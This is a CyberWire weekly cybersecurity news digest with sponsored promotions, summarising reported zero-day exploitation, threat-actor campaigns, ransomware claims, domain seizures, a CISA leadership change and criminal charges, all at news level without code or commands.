By the CyberWire staff
At a glance.
- Palo Alto Networks warns of PAN-OS zero-day exploitation.
- LIMINAL PANDA targets telecoms.
- DeepData malware framework exploits Fortinet zero-day.
- Finastra is reportedly investigating a breach.
- China-aligned threat actor deploys new Linux malware.
- VMware vCenter Server flaws are being actively exploited.
- Russian cyberespionage campaign targets former Soviet states.
- Akira and SafePay ransomware groups claim dozens of victims.
- Meta takes down millions of accounts linked to pig-butchering scams.
- Microsoft seizes hundreds of phishing domains.
Palo Alto Networks warns of PAN-OS zero-day exploitation.
Palo Alto Networks has confirmed that threat actors are exploiting a recently discovered vulnerability affecting its PAN-OS firewall management interface, the Record reports. The vulnerability (CVE-2024-0012) has been assigned a CVSS score of 9.3, and the company urges customers to apply mitigations as soon as possible.
Palo Alto stated, "An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474." The company added that it's "observed threat activity that exploits this vulnerability against a limited number of management web interfaces that are exposed to internet traffic coming from outside the network."
LIMINAL PANDA targets telecoms.
CrowdStrike has published a report on LIMINAL PANDA, a Chinese threat actor targeting telecommunications companies in countries associated with China’s Belt and Road Initiative. The researchers note, "The adversary targets these organizations to directly collect network telemetry and subscriber information or to breach other telecommunications entities by exploiting the industry’s interoperational connection requirements."
The goal of the operation is likely cyberespionage. CrowdStrike explains, "LIMINAL PANDA has previously focused on telecommunications providers in southern Asia and Africa, suggesting that their final targets likely reside in these regions; however, individuals roaming in these areas may also be targeted depending on the compromised network’s configuration and LIMINAL PANDA’s current access. Equally, depending on their current collection requirements, the adversary could employ similar TTPs to target telecoms in other regions."
How CISOs are tackling the realities of AI adoption
How are security leaders navigating AI adoption? Hear from leading CISOs in the latest Tines report, CISO Perspectives: Separating the Reality of AI from the Hype.
What to expect:
- Top challenges CISOs are facing in AI adoption
- Key opportunities AI presents for security teams
- Strategies for handling the added pressure AI brings
Get the report to learn why 74% of CISOs believe AI will introduce more benefits than risks to the SOC.
DeepData malware framework exploits Fortinet zero-day.
Volexity warns that the DeepData malware framework is exploiting a zero-day credential disclosure vulnerability affecting Fortinet’s Windows VPN client (FortiClient). Volexity reported the flaw to Fortinet in July 2024, but it remains unpatched.
Volexity says the DeepData framework was developed by a Chinese state-sponsored threat actor tracked as "BrazenBamboo," though this threat actor isn't necessarily an operator of the malware. The researchers write, "DEEPDATA supports a wide range of functionality to extract data from victims’ systems. The observed functionality of several plugins is commonly seen and includes items typically stolen from victim systems. However, Volexity noted the FortiClient plugin was uncommon and investigated it further. Volexity found the FortiClient plugin was included through a library with the filename msenvico.dll. This plugin was found to exploit a zero-day vulnerability in the Fortinet VPN client on Windows that allows it to extract the credentials for the user from memory of the client’s process."
Finastra is reportedly investigating a breach.
KrebsOnSecurity reports that financial technology giant Finastra is investigating a large theft of information from its internal file transfer platform. The company began notifying customers of the breach on November 8th, informing them that a threat actor was selling the alleged stolen data on the dark web. Finastra said in a breach notification letter, "There is no direct impact on customer operations, our customers’ systems, or Finastra’s ability to serve our customers currently. We have implemented an alternative secure file-sharing platform to ensure continuity, and investigations are ongoing." The company added that it's still investigating the cause of the breach, but "initial evidence points to credentials that were compromised."
China-aligned threat actor deploys new Linux malware.
ESET has published a report on "WolfsBane," a newly discovered Linux backdoor deployed by the China-aligned threat actor Gelsemium. WolfsBane samples were uploaded to VirusTotal by users in Taiwan, the Philippines, and Singapore, which aligns with Gelsemium's targeting in previous campaigns. WolfsBane is the Linux equivalent of Gelsemium’s Gelsevirine Windows backdoor. ESET notes, "The trend of APT groups focusing on Linux malware is becoming more noticeable. We believe this shift is due to improvements in Windows email and endpoint security, such as the widespread use of endpoint detection and response (EDR) tools and Microsoft’s decision to disable Visual Basic for Applications (VBA) macros by default."
Master Identity Orchestration with the ultimate Dummies guide.
“This book nailed it. It breaks down Identity Orchestration in a way that’s easy to follow, but sharp enough for anyone serious about IAM strategy.” Identity Orchestration for Dummies is the only book that tackles how to eliminate identity silos and simplify IAM for modern security. Whether you’re aiming for Zero Trust or modernizing apps, this book is your step-by-step guide. Download your free copy now.
VMware vCenter Server flaws are being actively exploited.
The US Cybersecurity and Infrastructure Security Agency (CISA) warns that two vulnerabilities affecting VMware vCenter Server are being actively exploited. One of the flaws (CVE-2024-38812) has been assigned a CVSS score of 9.8 and can allow an attacker to achieve remote code execution. Broadcom issued updated patches in October after determining that its September patches didn't fully address the vulnerability. The company strongly encourages customers to ensure they've applied the new patches. The vulnerabilities affect "VMware vCenter and any products that contain vCenter, including VMware vSphere and VMware Cloud Foundation."
Russian cyberespionage campaign targets former Soviet states.
Recorded Future's Insikt Group has published a report on a Russian cyberespionage campaign targeting organizations in Central Asia, East Asia, and Europe with two strains of custom malware dubbed "HATVIBE" and "CHERRYSPY." Insikt Group attributes the campaign to the Russia-aligned threat actor TAG-110, noting that the tactics overlap with previous operations by Russia's APT28 (also known as "Fancy Bear").
Since July 2024, the espionage campaign has targeted governments, human rights groups, and educational institutions in eleven countries, including Kazakhstan, Kyrgyzstan, and Uzbekistan. The researchers note, "TAG-110’s efforts are likely part of a broader Russian strategy to gather intelligence on geopolitical developments and maintain influence in post-Soviet states."
Akira and SafePay ransomware groups claim dozens of victims.
The Akira ransomware group posted 32 victims to its leak site in a single day last week, according to researchers at Cyberint. The ransomware-as-a-service operation claims to have compromised more than 350 organizations since its emergence in March 2023. Most of its recent victims are located in the United States.
Separately, researchers at Huntress warn that the relatively new ransomware gang "SafePay" has claimed 22 victims as of November 14th. The group's ransomware appears to be built using the leaked LockBit source code. Huntress analyzed two of the group's attacks, noting, "In both incidents, the threat actor’s activity was found to originate from a VPN gateway or portal, as all observed IP addresses assigned to threat actor workstations were within the internal range. The threat actor was able to use valid credentials to access customer endpoints, and was not observed enabling RDP, nor creating new user accounts, nor creating any other persistence."
Survey Your Security Perimeter with a Free Security Assessment
By getting started with a free identity security assessment, Cisco can help you find and secure the gaps in your identity infrastructure and provide insights for improving your identity posture. Outcomes of the assessment include:
- A complete view of your identity security posture
- A detailed view of all identities and devices logging into your network
- An analysis of your multi-factor authentication usage and adoption
- A snapshot of your total number of inactive accounts
Request Your Free Identity Security Assessment Today.
Meta takes down millions of accounts linked to pig-butchering scams.
Facebook's parent company Meta has taken down over two million accounts this year tied to pig-butchering scams, CyberScoop reports. Pig butchering is a form of investment scam that involves forming a long-term, trusted relationship with the victim and tricking them into pouring a great deal of money into a phony investment scheme, usually involving cryptocurrency. The scams often begin on dating apps or social media sites.
Many of these scams are run out of criminal forced-labor operations in Myanmar, Laos, Cambodia, the United Arab Emirates, and the Philippines. Meta states, "During the COVID-19 pandemic, scam compounds run by organized crime emerged in the Asia Pacific region as one of the major sources of ‘pig butchering’ and other scam activity. And while they are mostly based in Asia, scam centers target people across the globe. These criminal scam hubs lure often unsuspecting job seekers with too-good-to-be-true job postings on local job boards, forums, and recruitment platforms to then force them to work as online scammers, often under the threat of physical abuse."
Microsoft seizes hundreds of phishing domains.
Microsoft’s Digital Crimes Unit has seized 240 domains used by the ONNX phishing-as-a-service operation, BleepingComputer reports. Microsoft stated, "Phishing emails originating from these 'do it yourself' kits make up a significant portion of the tens to hundreds of millions of phishing messages observed by Microsoft each month. The fraudulent ONNX operations are part of the broader “Phishing-as-a-Service” (PhaaS) industry and as noted in this year’s Microsoft Digital Defense Report, the operation was among the top five phish kit providers by email volume in the first half of 2024."
Microsoft also named an Egyptian national, Abanoub Nady, as the alleged leader of the fraudulent ONNX operation.
Dropzone AI Named a Gartner Cool Vendor for the Modern SOC.
Dropzone AI has been recognized as a Gartner Cool Vendor, validating its role in transforming SOCs. With an AI SOC Analyst that autonomously investigates alerts 24/7, Dropzone AI helps security teams stay ahead by reducing alert fatigue and providing decision-ready insights. Discover how we're leading SOC innovation.
ClickFix attacks trick users into running malicious PowerShell commands.
Proofpoint describes a social engineering technique dubbed "ClickFix," which attempts to trick users into copying and pasting PowerShell commands to install malware. Proofpoint explains, "The ClickFix technique is used by multiple different threat actors and can originate via compromised websites, documents, HTML attachments, malicious URLs, etc. In most cases, when directed to the malicious URL or file, users are shown a dialog box that suggests an error occurred when trying to open a document or webpage. This dialog box includes instructions that appear to describe how to 'fix' the problem, but will either: automatically copy and paste a malicious script into the PowerShell terminal, or the Windows Run dialog box, to eventually run a malicious script via PowerShell; or provide a user with instructions on how to manually open PowerShell and copy and paste the provided command."
The technique has been used to install a range of malware strains, including AsyncRAT, Danabot, DarkGate, Lumma Stealer, and NetSupport.
CISA director Jen Easterly will depart in January.
Nextgov reports that Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), will leave the agency when President-elect Trump is inaugurated on January 20th. Also departing are Deputy Director Nitin Natarajan, Executive Assistant Director for Cybersecurity Jeff Greene, and Executive Assistant Director for Infrastructure Security David Mussington.
A CISA spokesperson told Meritalk, "All appointees of the Biden administration will vacate their positions by the time the new administration takes office at noon on January 20th. At CISA, we are fully committed to a seamless transition."
GigaOM CxO Brief: Learn why Cobalt is a leader in OST and PtaaS
Driven by an increasing attack surface, sophisticated cybersecurity threats, and the perennial gap in security expertise, companies are turning to more proactive means to evaluate their defenses.
In this report find out:
- The circumstances driving adoption of offsec measures.
- Best practices to maximize the value of this type of testing.
- The organizational impact companies see from using proactive security measures.
Download GigaOm’s CxO Brief to understand how offensive security testing helps organizations maximize their security spend at scale.
Patch news.
Oracle has issued a patch for an actively exploited vulnerability (CVE-2024-21287) affecting its Agile Product Lifecycle Management software, BleepingComputer reports. Oracle stated, "This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. If successfully exploited, this vulnerability may result in file disclosure."
Crime and punishment.
The US Justice Department has charged five alleged members of the Scattered Spider cybercriminal group, accusing them of exfiltrating sensitive corporate data and stealing millions of dollars worth of cryptocurrency, CyberScoop reports. Four of the defendants are US citizens, and one is from the UK.
The Justice Department has also charged a 42-year-old Russian national named Evgenii Ptitsyn as an alleged administrator of the Phobos ransomware-as-a-service operation. The defendant was extradited from South Korea and appeared before the US District Court for the District of Maryland earlier this month. The Justice Department says Phobos affiliates have "victimized more than 1,000 public and private entities in the United States and around the world, and extorted ransom payments worth more than $16 million dollars."